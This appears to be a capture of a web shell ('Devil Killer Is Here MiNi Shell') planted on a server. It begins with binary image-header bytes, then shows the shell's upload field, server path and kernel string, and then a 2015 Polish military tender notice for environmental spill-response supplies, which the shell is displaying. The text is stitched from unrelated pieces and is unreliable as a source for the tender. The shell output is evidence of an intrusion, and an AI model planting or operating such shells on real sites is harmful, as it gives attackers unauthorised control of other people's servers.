JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150807/117953-N-2015.html

<p class="kh_header"><b>Rzeszów: Zakup sprzętu i produktów jednorazowego użytku służącego do przeciwdziałania negatywnemu oddziaływaniu na środowisko (zamówienie z podziałem na 4 części)</b><br>
<b>Numer ogłoszenia: 117953 - 2015; data zamieszczenia: 07.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4784 , ul. Krakowska 11B, 35-111 Rzeszów, woj. podkarpackie, tel. 17 715 56 59, faks 17 715 63 85.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.34wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu i produktów jednorazowego użytku służącego do przeciwdziałania negatywnemu oddziaływaniu na środowisko (zamówienie z podziałem na 4 części).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia stanowi jednorazową dostawę sprzętu i produktów jednorazowego użytku służącego do przeciwdziałania negatywnemu oddziaływaniu na środowisko (wanny wychwytowe, apteczki ekologiczne, maty sorpcyjne, sorbent itp.).
2. Przedmiot zamówienia podzielony został na 4 następujące części:
1) część nr 1: asortyment I - z przeznaczeniem do magazynu SOŚ Żurawica, ul. Wojska Polskiego 22, bud. 28.
a) Przedmiot zamówienia obejmuje dostawę następującego asortymentu: wanny wyłapujące elastyczne, pojemniki polietylenowe skrzyniowe na odpady niebezpieczne, pojemniki dwudzielne na sorbent, pojemniki mobilne, pojemniki z tworzywa sztucznego z kodem UN, zmiotki + szufelki do sorbentu, szczotki drogowe z kijem, wanny wychwytowe polietylenowae pod 2 beczki, wiadra plastikowe z pokrywą i uchwytem, skrzyniopalety z pokrywą, pojemniki/ skrzynie do składowania materiałów niebezpiecznych, stojaki na matę sorpcyjną, wanienki wychwytowe pod pojazdy, beczki na stłuczone świetlówki z pokrywą, awaryjne zestawy chemiczne, polietylenowe wanny z kratownicą, sorbent sypki do oleju, sorbent uniwersalny w formie rękawa, preparat odtłuszczające w kanistrze, worki na odpady, uniwersalne wykładziny sorpcyjne, maty sorpcyjne, worki jutowe, siarka granulowana i in.
b) Szczegółowy opis przedmiotu zamówienia dla części nr 1 w zakresie wymogów co do rodzaju asortymentu, jego ilości oraz parametrów technicznych przedstawiony został w Załączniku nr 1A do SIWZ. Załącznik ten stanowi równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia.
2) część nr 2: asortyment II - z przeznaczeniem do magazynu SOŚ Jarosław, ul. Poniatowskiego 49a.
a) Przedmiot zamówienia obejmuje dostawę następującego asortymentu: przenośne zestawy sorbentów, wanienki wychwytowe pod pojazdy, beczki na stłuczone świetlówki z pokrywą, wanny wychwytowe pod 2 beczki, wózek manipulacyjny do beczek, łańcuchy ostrzegawcze do beczek, metalowe lejki, lejki beczkowe z uchwytem, plastikowe konewki z miarką, plastikowe pojemniki z miarą, niska wyłapująca wanna pod 4 beczki, najazdowy podest, wyłapująca wanna bez materiału sorpcyjnego, stojak na worek z metalowym wiekiem, sorbent sypki do oleju, uniwersalne wykładziny sorpcyjne, sorbent sypki chemiczny, maty sorpcyjne, siarka granulowana, uniwersalna wykładzina sorpcyjna, worek na odpady
b) Szczegółowy opis przedmiotu zamówienia dla części nr 2 w zakresie wymogów co do rodzaju asortymentu, jego ilości oraz parametrów technicznych przedstawiony został w Załączniku nr 1B do SIWZ. Załącznik ten stanowi równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia.
3) część nr 3: asortyment III - z przeznaczeniem do magazynu SOŚ Rzeszów, ul. Konopnickiej 5.
a) Przedmiot zamówienia obejmuje dostawę następującego asortymentu: plastikowe pachołki do wyznaczania stref, stojaki polietylenowe do dozowania płynów, wanny wyłapujące z kratownicą, wózek manipulacyjny do beczek, stojaki na worek z metalowym wiekiem, apteczki ekologiczne ADR do oleju, pojemniki dwudzielne na sorbent, manipulacyjne dźwignie do beczek, apteczki ekologiczne do oleju, awaryjne zestawy chemiczne, pojemniki mobilne na odpady, wanny wychwytowe pod 2 beczki, wyłapujące wanny ociekowe, wiadra plastikowe z pokrywą i uchwytem, wanienki wychwytowe pod pojazdy, wanna wychwytowa pod 1 beczkę, beczka na stłuczone świetlówki z pokrywą, apteczki ekologiczne małe, stojaki na matę sorpcyjną w formie rolki, wózki posypowe, awaryjne zestawy chemiczne, wyłapujące kanistry do zbierania wycieków spod pojazdów, przenośne lejki na beczkę, łańcuchy ostrzegawcze, ścierki sorpcyjne do oleju, sorbenty sypkie do oleju, worki na odpady, preparaty odtłuszczające w kanistrze, siarka granulowana, sorbent uniwersalny w formie rolki, sorbent chemiczny w formie rolki, sorbent uniwersalny w formie rękawa, sorbent sypki chemiczny, mata sorpcyjna uniwersalna i in.
b) Szczegółowy opis przedmiotu zamówienia dla części nr 3 w zakresie wymogów co do rodzaju asortymentu, jego ilości oraz parametrów technicznych przedstawiony został w Załączniku nr 1C do SIWZ. Załącznik ten stanowi równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia.
4) część nr 4: asortyment IV - z przeznaczeniem do magazynu SOŚ Nisko, ul. Sandomierska 20, bud. 49.
a) Przedmiot zamówienia obejmuje dostawę następującego asortymentu: beczka na stłuczone świetlówki, niskie wyłapujące wanny polietylenowe pod 4 beczki, kosze zabezpieczające na materiały łatwopalne, wyłapujące kanistry, plastikowe konewki z miarką , apteczki ekologiczne do oleju,  wanienki wychwytowe pod pojazdy, pojemniki mobilne na odpady niebezpieczne, apteczki ekologiczne ADR do oleju, stojaki na matę sorpcyjną w formie rolki, awaryjny zestaw chemiczny, mobilny, wanny wyłapujące elastyczne, składane, siarka granulowana, maty sorpcyjne do oleju, worki na odpady, sorbent sypki do oleju, ścierki sorpcyjne i in.
b) Szczegółowy opis przedmiotu zamówienia dla części nr 4 w zakresie wymogów co do rodzaju asortymentu, jego ilości oraz parametrów technicznych przedstawiony został w Załączniku nr 1D do SIWZ. Załącznik ten stanowi równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia.
3. Dostawa zaoferowanego przedmiotu zamówienia odbywać się będzie na koszt i ryzyko Wykonawcy (koszty transportu ponosi Wykonawca).
4. Faktury zgodne z asortymentem dostarczonych partii towaru oraz cenami ofertowymi, muszą być załączone każdorazowo do dostawy oddzielnie na każdy magazyn.
5. Miejscem wykonania przedmiotu umowy są magazyny zlokalizowane pod n/w adresami Zamawiającego przy:
1) ul. Wojska Polskiego 22,Żurawicy,
2) ul. Poniatowskiego 49,  Jarosław,
3) ul. Konopnickiej 5,  Rzeszowie,
4) ul. Sandomierska 20, Nisko.
6. Dostawa obejmuje rozładunek przedmiotu dostawy do magazynów Zamawiającego własnymi siłami i w sposób umożliwiający jego przeliczenie i sprawdzenie jakości. Nie zastosowanie się do zasad dotyczących rozładunku eliminuje prawidłowe wykonanie dostawy.
7. Przy odbiorze dostawy jego zgodność z załącznikami do umowy zostanie sprawdzona w siedzibie Zamawiającego z udziałem obu stron. 
8. Zamawiający może odmówić przyjęcia towaru, którego zewnętrzne cechy wskazywać będą na jego nieodpowiednią jakość.
9. Dostawca jest odpowiedzialny względem Zamawiającego za wady, które posiadać będzie dostarczony przedmiot zamówienia. Dostawca udziela 12 miesięcznej gwarancji na zakupiony towar, chyba , ze szczegółowy opis przedmiotu zamówienia określony w Załącznikach od nr 1A do 1D stanowi inaczej.
10. Jeżeli w jakimkolwiek miejscu niniejszej SIWZ wskazane zostały nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenie materiałów - wszędzie tam Zamawiający dodaje wyrazy lub równoważne.
11. Zamiast materiałów, dla których wskazane są nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenie Wykonawca może zaoferować materiały równoważne pod względem parametrów technicznych, jakościowych, funkcjonalnych oraz użytkowych. 
12. Stosownie do art. 30 ust. 5 ustawy Pzp Wykonawca powołujący się na zaoferowanie materiałów równoważnych winien wykazać, iż spełniają one wymogi Zamawiającego w szczególności poprzez udokumentowanie załączonymi do oferty informacjami na temat parametrów technicznych, jakościowych, funkcjonalnych oraz użytkowych.  W przypadku brak wyżej wymienionych informacji, dokumentów Zamawiający domniemywa, że zostały zaoferowane materiały opisane przez Zamawiającego poprzez wskazanie nazwy producenta, nazwy własnej, znaku towarowego, patentu lub pochodzenia materiałów.
13. Uzupełnienie opisu przedmiotu zamówienia w zakresie postanowień nie uregulowanych zapisami niniejszego Rozdziału stanowi również Projekt umowy.
14. Zamawiający nie przewiduje zawarcia umowy ramowej. 
15. Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 35.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy, formularze kalkulacji ceny ofertowej, ew. pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Najkrótszy termin wykonania zamówienia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.34wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać ze strony internetowej, jak również istnieje możliwość jej odebrania w Sekcji Zamówień Publicznych: ul. Krakowska 11B, 35-111 Rzeszów, budynek nr 12 pok. nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2015 godzina 10:30, miejsce: Jednostka Wojskowa nr 4784 w Rzeszowie, ul. Krakowska 11B, budynek nr 12, pok. nr 1 (kancelaria jawna), 35-111 Rzeszów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Termin realizacji zamówienia Wykonawca określi w złożonej ofercie. Zaproponowany termin podlegał będzie ocenie w kryterium oceny ofert. W niniejszym ogłoszeniu wymagany 20 dniowy termin realizacji zamówienia (wyrażony w dniach roboczych) to termin maksymalny
2. Zgodnie z art. 24 ust. 2a ustawy Pzp Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część nr 1: asortyment I - z przeznaczeniem do magazynu SOŚ Żurawica, ul. Wojska Polskiego 22, bud. 28.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Przedmiot zamówienia obejmuje dostawę następującego asortymentu: wanny wyłapujące elastyczne, pojemniki polietylenowe skrzyniowe na odpady niebezpieczne, pojemniki dwudzielne na sorbent, pojemniki mobilne, pojemniki z tworzywa sztucznego z kodem UN, zmiotki + szufelki do sorbentu, szczotki drogowe z kijem, wanny wychwytowe polietylenowae pod 2 beczki, wiadra plastikowe z pokrywą i uchwytem, skrzyniopalety z pokrywą, pojemniki/ skrzynie do składowania materiałów niebezpiecznych, stojaki na matę sorpcyjną, wanienki wychwytowe pod pojazdy, beczki na stłuczone świetlówki z pokrywą, awaryjne zestawy chemiczne, polietylenowe wanny z kratownicą, sorbent sypki do oleju, sorbent uniwersalny w formie rękawa, preparat odtłuszczające w kanistrze, worki na odpady, uniwersalne wykładziny sorpcyjne, maty sorpcyjne, worki jutowe, siarka granulowana i in.
b) Szczegółowy opis przedmiotu zamówienia dla części nr 1 w zakresie wymogów co do rodzaju asortymentu, jego ilości oraz parametrów technicznych przedstawiony został w Załączniku nr 1A do SIWZ. Załącznik ten stanowi równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Najkrótszy termin wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część nr 2: asortyment II - z przeznaczeniem do magazynu SOŚ Jarosław, ul. Poniatowskiego 49a.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Przedmiot zamówienia obejmuje dostawę następującego asortymentu: przenośne zestawy sorbentów, wanienki wychwytowe pod pojazdy, beczki na stłuczone świetlówki z pokrywą, wanny wychwytowe pod 2 beczki, wózek manipulacyjny do beczek, łańcuchy ostrzegawcze do beczek, metalowe lejki, lejki beczkowe z uchwytem, plastikowe konewki z miarką, plastikowe pojemniki z miarą, niska wyłapująca wanna pod 4 beczki, najazdowy podest, wyłapująca wanna bez materiału sorpcyjnego, stojak na worek z metalowym wiekiem, sorbent sypki do oleju, uniwersalne wykładziny sorpcyjne, sorbent sypki chemiczny, maty sorpcyjne, siarka granulowana, uniwersalna wykładzina sorpcyjna, worek na odpady
b) Szczegółowy opis przedmiotu zamówienia dla części nr 2 w zakresie wymogów co do rodzaju asortymentu, jego ilości oraz parametrów technicznych przedstawiony został w Załączniku nr 1B do SIWZ. Załącznik ten stanowi równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Najkrótszy termin wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> część nr 3: asortyment III - z przeznaczeniem do magazynu SOŚ Rzeszów, ul. Konopnickiej 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Przedmiot zamówienia obejmuje dostawę następującego asortymentu: plastikowe pachołki do wyznaczania stref, stojaki polietylenowe do dozowania płynów, wanny wyłapujące z kratownicą, wózek manipulacyjny do beczek, stojaki na worek z metalowym wiekiem, apteczki ekologiczne ADR do oleju, pojemniki dwudzielne na sorbent, manipulacyjne dźwignie do beczek, apteczki ekologiczne do oleju, awaryjne zestawy chemiczne, pojemniki mobilne na odpady, wanny wychwytowe pod 2 beczki, wyłapujące wanny ociekowe, wiadra plastikowe z pokrywą i uchwytem, wanienki wychwytowe pod pojazdy, wanna wychwytowa pod 1 beczkę, beczka na stłuczone świetlówki z pokrywą, apteczki ekologiczne małe, stojaki na matę sorpcyjną w formie rolki, wózki posypowe, awaryjne zestawy chemiczne, wyłapujące kanistry do zbierania wycieków spod pojazdów, przenośne lejki na beczkę, łańcuchy ostrzegawcze, ścierki sorpcyjne do oleju, sorbenty sypkie do oleju, worki na odpady, preparaty odtłuszczające w kanistrze, siarka granulowana, sorbent uniwersalny w formie rolki, sorbent chemiczny w formie rolki, sorbent uniwersalny w formie rękawa, sorbent sypki chemiczny, mata sorpcyjna uniwersalna i in.
b)	Szczegółowy opis przedmiotu zamówienia dla części nr 3 w zakresie wymogów co do rodzaju asortymentu, jego ilości oraz parametrów technicznych przedstawiony został w Załączniku nr 1C do SIWZ. Załącznik ten stanowi równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Najkrótszy termin wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> część nr 4: asortyment IV - z przeznaczeniem do magazynu SOŚ Nisko, ul. Sandomierska 20, bud. 49.</p>
